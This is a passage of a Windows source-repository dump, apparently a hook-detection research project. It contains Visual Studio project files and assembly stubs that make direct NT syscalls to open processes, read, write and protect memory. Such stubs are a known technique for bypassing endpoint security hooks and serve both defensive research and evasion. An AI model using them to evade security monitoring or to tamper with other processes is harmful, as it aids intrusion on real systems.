{2F83EC28-30EA-4FF5-843B-EE474D66B935}.Release|x64.Build.0 = Release|x64 58 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Release|x86.ActiveCfg = Release|Win32 59 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Release|x86.Build.0 = Release|Win32 60 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Debug|x64.ActiveCfg = Debug|x64 61 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Debug|x64.Build.0 = Debug|x64 62 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Debug|x86.ActiveCfg = Debug|Win32 63 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Debug|x86.Build.0 = Debug|Win32 64 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Release|x64.ActiveCfg = Release|x64 65 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Release|x64.Build.0 = Release|x64 66 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Release|x86.ActiveCfg = Release|Win32 67 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Release|x86.Build.0 = Release|Win32 68 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Debug|x64.ActiveCfg = Debug|x64 69 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Debug|x64.Build.0 = Debug|x64 70 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Debug|x86.ActiveCfg = Debug|Win32 71 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Debug|x86.Build.0 = Debug|Win32 72 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Release|x64.ActiveCfg = Release|x64 73 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Release|x64.Build.0 = Release|x64 74 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Release|x86.ActiveCfg = Release|Win32 75 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Release|x86.Build.0 = Release|Win32 76 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Debug|x64.ActiveCfg = Debug|x64 77 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Debug|x64.Build.0 = Debug|x64 78 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Debug|x86.ActiveCfg = Debug|Win32 79 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Debug|x86.Build.0 = Debug|Win32 80 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Release|x64.ActiveCfg = Release|x64 81 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Release|x64.Build.0 = Release|x64 82 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Release|x86.ActiveCfg = Release|Win32 83 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Release|x86.Build.0 = Release|Win32 84 | EndGlobalSection 85 | GlobalSection(SolutionProperties) = preSolution 86 | HideSolutionNode = FALSE 87 | EndGlobalSection 88 | GlobalSection(ExtensibilityGlobals) = postSolution 89 | SolutionGuid = {1A48B0F9-A928-4BAA-8F59-8DA36F6AB26F} 90 | EndGlobalSection 91 | EndGlobal 92 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/HookFinder.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | 34 | 35 | Source Files 36 | 37 | 38 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/HookFinder.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | HookDetector 24 | 10.0 25 | HookDetector 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | DebugFull 89 | Console 90 | 91 | 92 | 93 | 94 | Level3 95 | MaxSpeed 96 | true 97 | true 98 | true 99 | MultiThreaded 100 | 101 | 102 | true 103 | true 104 | 105 | 106 | 107 | 108 | Level3 109 | MaxSpeed 110 | true 111 | true 112 | true 113 | MultiThreaded 114 | 115 | 116 | true 117 | true 118 | false 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/main.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | void LoadProloguesFromDisk(DllFunctionMap& expectedData); 4 | 5 | void LoadInterestingLibraries(std::set& dllsToProcess, int& pid); 6 | 7 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/sysc_sw2.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | NtRVM PROC 4 | mov eax, 003fh 5 | mov r10, rcx 6 | syscall 7 | ret 8 | NtRVM ENDP 9 | 10 | NtOP PROC 11 | mov eax, 0026h 12 | mov r10, rcx 13 | syscall 14 | ret 15 | NtOP ENDP 16 | 17 | 18 | end -------------------------------------------------------------------------------- /CustomCode/HookFinder/sysc_sw2.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | EXTERN_C NTSTATUS NtRVM( 6 | IN HANDLE ProcessHandle, 7 | IN PVOID BaseAddress OPTIONAL, 8 | OUT PVOID Buffer, 9 | IN SIZE_T BufferSize, 10 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 11 | 12 | EXTERN_C NTSTATUS NtOP( 13 | OUT PHANDLE ProcessHandle, 14 | IN ACCESS_MASK DesiredAccess, 15 | IN POBJECT_ATTRIBUTES ObjectAttributes, 16 | IN PCLIENT_ID ClientId OPTIONAL); 17 | 18 | 19 | -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/InterprocessMethodCloning.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | HookDetectorTM 24 | 10.0 25 | InterProcessFunctionCopying 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | Console 89 | 90 | 91 | 92 | 93 | Level3 94 | MaxSpeed 95 | true 96 | true 97 | true 98 | MultiThreaded 99 | 100 | 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | MaxSpeed 109 | true 110 | true 111 | true 112 | MultiThreaded 113 | 114 | 115 | true 116 | true 117 | false 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/InterprocessMethodCloning.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | 34 | 35 | Source Files 36 | 37 | 38 | -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/sysc_sw2.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | NtReadVirtualMemory PROC 4 | mov rax, gs:[60h] ; Load PEB into RAX. 5 | NtReadVirtualMemory_Check_X_X_XXXX: ; Check major version. 6 | cmp dword ptr [rax+118h], 10 7 | je NtReadVirtualMemory_Check_10_0_XXXX 8 | jmp NtReadVirtualMemory_SystemCall_Unknown 9 | NtReadVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 10 | cmp word ptr [rax+120h], 10240 11 | je NtReadVirtualMemory_SystemCall_10_0_10240 12 | cmp word ptr [rax+120h], 10586 13 | je NtReadVirtualMemory_SystemCall_10_0_10586 14 | cmp word ptr [rax+120h], 14393 15 | je NtReadVirtualMemory_SystemCall_10_0_14393 16 | cmp word ptr [rax+120h], 15063 17 | je NtReadVirtualMemory_SystemCall_10_0_15063 18 | cmp word ptr [rax+120h], 16299 19 | je NtReadVirtualMemory_SystemCall_10_0_16299 20 | cmp word ptr [rax+120h], 17134 21 | je NtReadVirtualMemory_SystemCall_10_0_17134 22 | cmp word ptr [rax+120h], 17763 23 | je NtReadVirtualMemory_SystemCall_10_0_17763 24 | cmp word ptr [rax+120h], 18362 25 | je NtReadVirtualMemory_SystemCall_10_0_18362 26 | cmp word ptr [rax+120h], 18363 27 | je NtReadVirtualMemory_SystemCall_10_0_18363 28 | cmp word ptr [rax+120h], 19041 29 | je NtReadVirtualMemory_SystemCall_10_0_19041 30 | cmp word ptr [rax+120h], 19042 31 | je NtReadVirtualMemory_SystemCall_10_0_19042 32 | jmp NtReadVirtualMemory_SystemCall_Unknown 33 | NtReadVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 34 | mov eax, 003fh 35 | jmp NtReadVirtualMemory_Epilogue 36 | NtReadVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 37 | mov eax, 003fh 38 | jmp NtReadVirtualMemory_Epilogue 39 | NtReadVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 40 | mov eax, 003fh 41 | jmp NtReadVirtualMemory_Epilogue 42 | NtReadVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 43 | mov eax, 003fh 44 | jmp NtReadVirtualMemory_Epilogue 45 | NtReadVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 46 | mov eax, 003fh 47 | jmp NtReadVirtualMemory_Epilogue 48 | NtReadVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 49 | mov eax, 003fh 50 | jmp NtReadVirtualMemory_Epilogue 51 | NtReadVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 52 | mov eax, 003fh 53 | jmp NtReadVirtualMemory_Epilogue 54 | NtReadVirtualMemory_SystemCall_10_0_18362: ; Windows 10.0.18362 (1903) 55 | mov eax, 003fh 56 | jmp NtReadVirtualMemory_Epilogue 57 | NtReadVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 58 | mov eax, 003fh 59 | jmp NtReadVirtualMemory_Epilogue 60 | NtReadVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 61 | mov eax, 003fh 62 | jmp NtReadVirtualMemory_Epilogue 63 | NtReadVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 64 | mov eax, 003fh 65 | jmp NtReadVirtualMemory_Epilogue 66 | NtReadVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 67 | ret 68 | NtReadVirtualMemory_Epilogue: 69 | mov r10, rcx 70 | syscall 71 | ret 72 | NtReadVirtualMemory ENDP 73 | 74 | end -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/sysc_sw2.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | EXTERN_C NTSTATUS NtReadVirtualMemory( 6 | IN HANDLE ProcessHandle, 7 | IN PVOID BaseAddress OPTIONAL, 8 | OUT PVOID Buffer, 9 | IN SIZE_T BufferSize, 10 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 11 | 12 | -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/InterProcessSectionCopying.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4} 23 | HookDetectorTM 24 | 10.0 25 | InterProcessSectionCopying 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | Console 89 | 90 | 91 | 92 | 93 | Level3 94 | MaxSpeed 95 | true 96 | true 97 | true 98 | MultiThreaded 99 | 100 | 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | MaxSpeed 109 | true 110 | true 111 | true 112 | MultiThreaded 113 | 114 | 115 | true 116 | true 117 | false 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/InterProcessSectionCopying.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | 28 | 29 | Header Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 